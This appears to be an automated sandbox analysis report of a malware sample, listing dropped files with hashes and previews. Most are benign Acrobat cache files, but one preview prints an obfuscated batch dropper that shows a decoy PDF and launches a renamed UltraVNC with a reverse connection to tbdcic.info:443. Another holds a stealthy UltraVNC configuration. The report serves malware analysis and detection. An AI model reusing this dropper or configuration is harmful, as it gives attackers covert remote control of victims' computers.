                                                  SHA-256:B9CFE9C8043ACC8F70CAB71C9D6DA6DA25F746FD45F70461F65127FB1FA69675
                                                  SHA-512:71D7FA17FAC72E9020CED6F232F9CED5729C2F3EF90702523A7D40AF6F5C01707C999161F75361EDBEECB464719128AB847420B8CBEA12B769D0683D691BA2C2
                                                  Malicious:false
                                                  Preview:{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):289
                                                  Entropy (8bit):5.286232842997864
                                                  Encrypted:false
                                                  SSDEEP:6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfFldPeUkwRe9:YvXKXbOlpSGcDicXYGz8Ukee9
                                                  MD5:60FC416DE0A46B3222D8EBB4D259968E
                                                  SHA1:3A400E9BAC60E0A77D8428192C52D4D98EBB4951
                                                  SHA-256:22C2011FB85EE0AB383757F95A4E96A5DA136D402CD8D7F22C3DA0F5E0D2D6A6
                                                  SHA-512:FDDF056D32E73D96BBC8A8515E8F62DDFAE96CC4E6D9C54055AC2FB61DD2EEAAB3D872240DCEB352F60812DBB3C913B5AE1532B2F5B4F9DACD432D437DE4D6FE
                                                  Malicious:false
                                                  Preview:{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):295
                                                  Entropy (8bit):5.304166227732885
                                                  Encrypted:false
                                                  SSDEEP:6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfzdPeUkwRe9:YvXKXbOlpSGcDicXYGb8Ukee9
                                                  MD5:59F16EB17CCC808F1C1F7DD847F71BB1
                                                  SHA1:CC23C8A0E3D0544275FF2C3777D10C5AAB38C716
                                                  SHA-256:891B159A4280321DA6DB440238155039746CF8B3D9FA630A93AF31B33CB91CCB
                                                  SHA-512:25A527213BA3E7AEC265D7F39C06AA56256E82277026454484D8AF528AEED8BA4171D8351F05979A8CEEBC36E3863BCD9DF684D73D81E89DE663561C17EB50E1
                                                  Malicious:false
                                                  Preview:{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):289
                                                  Entropy (8bit):5.2844944536930285
                                                  Encrypted:false
                                                  SSDEEP:6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfYdPeUkwRe9:YvXKXbOlpSGcDicXYGg8Ukee9
                                                  MD5:0B2CDDF70D1227669A4E444A90826687
                                                  SHA1:16E7A16ECA121D7ACDDA015B86873D777C501AEC
                                                  SHA-256:4CACFE462D5C2250879541C9856AEFF0929EC2264B7D3BA37A11B8A3A17D28B2
                                                  SHA-512:E970ECB9DC5F856CDDA15804BA2039AE59B28ED7E2509E5BB3D5064E5039D76D54A5AFE40AD8D76AAE9B076728BE8C1D65E1C5D57BD495197D3601C787C5563C
                                                  Malicious:false
                                                  Preview:{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):284
                                                  Entropy (8bit):5.270853195166169
                                                  Encrypted:false
                                                  SSDEEP:6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJf+dPeUkwRe9:YvXKXbOlpSGcDicXYG28Ukee9
                                                  MD5:9C5ECC4BFC24A996D955AB1ABBA0A2D3
                                                  SHA1:BF7C6FCC022020F51F30A39D83B68E7A6BD0B51A
                                                  SHA-256:7FE495C2D5A1B1AC632D5BDF5C5F1D19DF6F34BEB8009262F81DBB58A44DC224
                                                  SHA-512:B6A6C7176D2C4E6578CDECCFAAE50910E1E5E3492EE5B587119AA515680B51F238611F225BBFC994FB3EBA75C8A0E7A0E72227F59839E18363CAADCF4F169F00
                                                  Malicious:false
                                                  Preview:{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):291
                                                  Entropy (8bit):5.268148118695462
                                                  Encrypted:false
                                                  SSDEEP:6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfbPtdPeUkwRe9:YvXKXbOlpSGcDicXYGDV8Ukee9
                                                  MD5:6A079ECDD1B8C448C7769D93DF47E363
                                                  SHA1:7DBF2E2C1FA98F4429BBC01B02130C2BCAC13D94
                                                  SHA-256:1AA387C309A4D8511BAB9D2DAE8D9F46A7DB2108C4B351C2C10F21F903BC580F
                                                  SHA-512:BFB3DA3B8D928642C0BEE0330F59780E3146EB3F1CCB4279003EB0C0C971FEBAFE0C9C6B30A70A1F8D0A2B5EC7FBF3B953F9CE814C39D581A10624E19B17E91F
                                                  Malicious:false
                                                  Preview:{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):287
                                                  Entropy (8bit):5.271314819092963
                                                  Encrypted:false
                                                  SSDEEP:6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJf21rPeUkwRe9:YvXKXbOlpSGcDicXYG+16Ukee9
                                                  MD5:677554BD9CEBDDB93193930AA25A9A13
                                                  SHA1:ADF4B40D941A7FBB5C2EF6EC6223814B6379C83A
                                                  SHA-256:9D6979BABCCBC945BA27357463C752F29D2896470E5C6DDFB6B5B880C96D2871
                                                  SHA-512:8A41FD27C4D6D200CEDBA1826175F090EBA5E73058F1BCD0823131CDA00797FEA2EF5F9C4CB09ACC218D8953E61F58D04675E890957F92A4D5C0B04CD9721071
                                                  Malicious:false
                                                  Preview:{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1090
                                                  Entropy (8bit):5.661805838582667
                                                  Encrypted:false
                                                  SSDEEP:24:Yv6XCl47+cXtamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSSY:Yvt+XBBgkDMUJUAh8cvMSY
                                                  MD5:17FC48CAD313521089D01200076008A9
                                                  SHA1:3973BB8A5815324B0BA492047A9A8EA9E66ED42F
                                                  SHA-256:90591E83763F090326B554B73431298E55B1F660AEA533CA8EC96D5957D8C322
                                                  SHA-512:0A8261FCD0C8ACC7EB6EAC13E6CA692B5ED3E752410046E6E3A17775C58713179462700000E8C1B291FA9E321CFCEE06E5F6DBC37775374E6334877D636CA404
                                                  Malicious:false
                                                  Preview:{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):286
                                                  Entropy (8bit):5.24688432673236
                                                  Encrypted:false
                                                  SSDEEP:6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJfshHHrPeUkwRe9:YvXKXbOlpSGcDicXYGUUUkee9
                                                  MD5:0F956FB4DB5D4F4DB93437F5E4F9E86C
                                                  SHA1:FC0219BFABB978B04F9BF8DE0016BDE94D547322
                                                  SHA-256:7AE6BA781F3BEE4E8072BF4E0FEA606F11EE047D0A40CD35C617094C07604365
                                                  SHA-512:BD8007AAD14DBCE879ED402C546BC93C09391D6D6FD0935608422044BFF8646CF441988688E833EC1BA8358B7EEE0B7FC2E9C4621D01091158CAD89B895B42D2
                                                  Malicious:false
                                                  Preview:{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):282
                                                  Entropy (8bit):5.258141536410747
                                                  Encrypted:false
                                                  SSDEEP:6:YEQXJ2HXhNETlpSGnZiQ0YIS/cXNxoAvJTqgFCrPeUkwRe9:YvXKXbOlpSGcDicXYGTq16Ukee9
                                                  MD5:941DADA3EA9FCD2E49BD435AB5052B33
                                                  SHA1:DA021DC6F615DCA9C2FB1CAA60C48DB4904954EC
                                                  SHA-256:495987D69B965989D6EC9F0596C358E328E469B37AD467976540452FA11AA01C
                                                  SHA-512:A70EA04AFA4CC6ED8B13918EC360741AD498D5D056897F3B9240FBAD9934145D577C9251F8FA5470C14EBFE9BF26782C3DA542B8EF514CD9C9979C3C02135383
                                                  Malicious:false
                                                  Preview:{"analyticsData":{"responseGUID":"f98c879e-ef4d-4e28-97a8-84a96cdd66d5","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1735134700929,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4
                                                  Entropy (8bit):0.8112781244591328
                                                  Encrypted:false
                                                  SSDEEP:3:e:e
                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                  Malicious:false
                                                  Preview:....
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2814
                                                  Entropy (8bit):5.147038781471403
                                                  Encrypted:false
                                                  SSDEEP:48:YEfwVUq5m1XWKvIiNK9i2eWcdW26XB8x9Dc:wVj54WKgx5kz6XMDc
                                                  MD5:2248781A2673B395007D0A61A9530ADA
                                                  SHA1:879B082387DFB4ADFFB69299429637D605741156
                                                  SHA-256:2AB03731B5A9F0BC5BEF58A49798DFFC8B1092BEFD9AC87AC09475F7AF344AE6
                                                  SHA-512:C68EE15523E3C6712FA0BBFF534183CE6982C6259575868633B0F3B74210BFD210A93DD919DF305297DC6BBC403D5E6E3B60C41B6513DE4C3F556465AF596D9D
                                                  Malicious:false
                                                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"d96ea3abdaccbd8c3c255ab921cc5d74","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734956965000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"cb403f8d3793c3abdfd70fe93634a554","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734956965000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"8c1b77a6c4f0ed9f6b4cc7e1bbce3b2d","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734956965000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"487b8eddb7e944186701bbc76050b69f","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734956965000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"25d45563c580c578c726358ab1106a82","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734956965000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"864f6433c0a0c86323bc00b7888f4765","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
                                                  Category:dropped
                                                  Size (bytes):12288
                                                  Entropy (8bit):1.1453114227554768
                                                  Encrypted:false
                                                  SSDEEP:24:TLhx/XYKQvGJF7ursl5gRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUud8:TFl2GL7msGXc+XcGNFlRYIX2v3k7
                                                  MD5:210DC19EF892831FEF9DE98371FD5A14
                                                  SHA1:7CCAA11A5343FB8DB535020D61B9D11CF1D524D1
                                                  SHA-256:C0A0DC8BA6BB70A834D201F11A002D52321B61B822B192D500CDAB2DD51ED1A9
                                                  SHA-512:C209E37CE0B67DDBC59D08532DDD31F4A315359EC28F4B269B54DB3BC1DA4606A109F6C17324B5F7338178ED7573ED6C24F271D3F4D5F20F671391F50E4C5542
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:SQLite Rollback Journal
                                                  Category:dropped
                                                  Size (bytes):8720
                                                  Entropy (8bit):1.5515216252577626
                                                  Encrypted:false
                                                  SSDEEP:24:7+twH5gUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxjqLxx/XT:7MGXc+XcGNFlRYIX2vOqVl2GL7ms5
                                                  MD5:7161E0D68C669BEE134ACA3959FD06FF
                                                  SHA1:44380E03600B05CB45ABA042249F418C66DBE1F6
                                                  SHA-256:38713FD63680772C6603840D48DC5381397CF4869E572037AC73913A5C468A5D
                                                  SHA-512:68EA4AB718A4C988F2A055C7095828FD73AF31FFC7F234E7873B87D740DDD05137B46DF13174EC76AE75227DA050BFD18E03AD804CC51F29AEE66DFE73327673
                                                  Malicious:false
                                                  Preview:.... .c......j...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):66726
                                                  Entropy (8bit):5.392739213842091
                                                  Encrypted:false
                                                  SSDEEP:768:RNOpblrU6TBH44ADKZEgp7fZqPvFZTbX1RGLTZwg/KVrKjYyu:6a6TZ44ADEp7f8PvFxD1t9UjK
                                                  MD5:38BE3D2FEF4EF8CEE3827C8F335DF8FD
                                                  SHA1:7F545B18626D4DE7D3AEE6802209C05076CC5C70
                                                  SHA-256:B9C656B3DD817DC2CEA58AC4ACF2558C263BF8B91A50377B5CD734ACF0EE0D5C
                                                  SHA-512:60F6DB32AFD854D72DD2C5D9B3093D4E7C0959E205B9E60F0ADAC62C21B406000F37F4F1E57B40CFCB6AA353C35AAF08AE7C14CB49E6192BAB2C7ABBB4536489
                                                  Malicious:false
                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                  Process:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                  File Type:DOS batch file, ASCII text
                                                  Category:dropped
                                                  Size (bytes):1063
                                                  Entropy (8bit):5.5415018235723945
                                                  Encrypted:false
                                                  SSDEEP:24:gDo8Dlr0RMqL0LtvJW2urcW1SalC/ki2wpx/m:aEb2AhFWx/m
                                                  MD5:651796E1EB5F2C51A6DD6929A65184DA
                                                  SHA1:C475C14C2D71453126FBDE6E135C4B68801A0E9F
                                                  SHA-256:8F0E40CBAAA9C09FA66C18BB90B54FD373EAEF4328E166EB5D0A3EE036F8DD49
                                                  SHA-512:C76F34CD8F7BC54A2D229B6DE8C0899FD676DB75001BAF0A7394655BE85CCE65539D3B7D1565A2381ADECF851615B9A989C9D83B22B6732BA4272026D9D8454F
                                                  Malicious:false
                                                  Preview:@echo off.setlocal enabledelayedexpansion.set dLblEw=nhost.set H9zjF6=nne.set Ely6ya=co.set rsZWbB=exe.set e2uPdm=Lom.set RscJfa=pdf.set DE4CBb=raVNC.set jq2jOU=%COMPUTERNAME%.set q6noQx=autore.set WWfq61=%WINDIR%\Tasks\698563441.cmd.set AMDK6l=tbdcic.info.set qC9Ryl=Thj0Wf.set eUynLD=443.set uTrzGi=co.set ayToqv=ct.set nM9rdS=Ult.set TfRayV=sync_browser.set erudre=ini.timeout /t 1.copy "gTFLK1.jBd3Ei" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%" & start "" "%HOMEPATH%\Downloads\%e2uPdm%.%RscJfa%".timeout /t 1.taskkill /f /im %TfRayV%.%rsZWbB% .timeout /t 2.copy "GIjul8.QTIrrr" "%TfRayV%.%rsZWbB%".timeout /t 1.copy "CEpr8q.li7XUg" "%nM9rdS%%DE4CBb%.%erudre%".timeout /t 2.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% .timeout /t 8.start "" %WINDIR%\Tasks\%TfRayV%.%rsZWbB% -%q6noQx%%Ely6ya%%H9zjF6%%ayToqv% -id:%jq2jOU%_%qC9Ryl% -%Ely6ya%%H9zjF6%%ayToqv% %AMDK6l%:%eUynLD%.timeout /t 2.copy "sdABZ4.E1924R" "%uTrzGi%%dLblEw%.%rsZWbB%".timeout /t 4.:loop.if exist "%WWfq61%" (. cmd /c "%WWfq61%". tim
                                                  Process:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                  File Type:Generic INItialization configuration [admin]
                                                  Category:dropped
                                                  Size (bytes):858
                                                  Entropy (8bit):5.216893826927931
                                                  Encrypted:false
                                                  SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                  MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                  SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                  SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                  SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                  Malicious:false
                                                  Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..
                                                  Process:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1945368
                                                  Entropy (8bit):6.532894678367002
                                                  Encrypted:false
                                                  SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                  MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                  SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                  SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                  SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                  File Type:PDF document, version 1.5 (zip deflate encoded)
                                                  Category:dropped
                                                  Size (bytes):605114
                                                  Entropy (8bit):7.931189302613814
                                                  Encrypted:false
                                                  SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                  MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                  SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                  SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                  SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                  Malicious:false
                                                  Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                  Process:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):867840
                                                  Entropy (8bit):6.386550733462827
                                                  Encrypted:false
                                                  SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                  MD5:0F568F6C821565AB9FF45C7457953789
                                                  SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                  SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                  SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):246
                                                  Entropy (8bit):3.5029068020919194
                                                  Encrypted:false
                                                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAkXNlH:Qw946cPbiOxDlbYnuRKDlDXN9
                                                  MD5:64F94D7B437BC5E4EE5EFB2ED1932091
                                                  SHA1:173613327CED1CDFF510922032B82A207D60864D
                                                  SHA-256:6BEA576D4F2690A3D3689943842FEEB4D59474309EBD5B89E6BB5E7010B86EC3
